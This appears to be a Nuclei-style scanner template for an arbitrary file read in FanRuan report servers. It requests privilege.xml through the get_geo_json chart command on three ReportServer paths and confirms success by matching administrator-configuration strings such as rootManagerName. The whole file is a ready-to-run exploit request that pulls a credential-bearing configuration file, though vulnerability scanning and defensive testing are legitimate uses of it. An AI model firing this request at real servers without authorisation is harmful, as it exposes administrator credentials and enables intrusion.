id: frServer-fileRead

info:
  name: 帆软报表任意文件读取
  author: str1am
  severity: high
  tags: fanran

requests:
  - method: GET
    path:
      - "{{BaseURL}}/seeyonreport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"
      - "{{BaseURL}}/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"
      - "{{BaseURL}}/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "rootManagerName"
          - "CDATA"
          - "PrivilegeManager"
        part: body
        condition: and
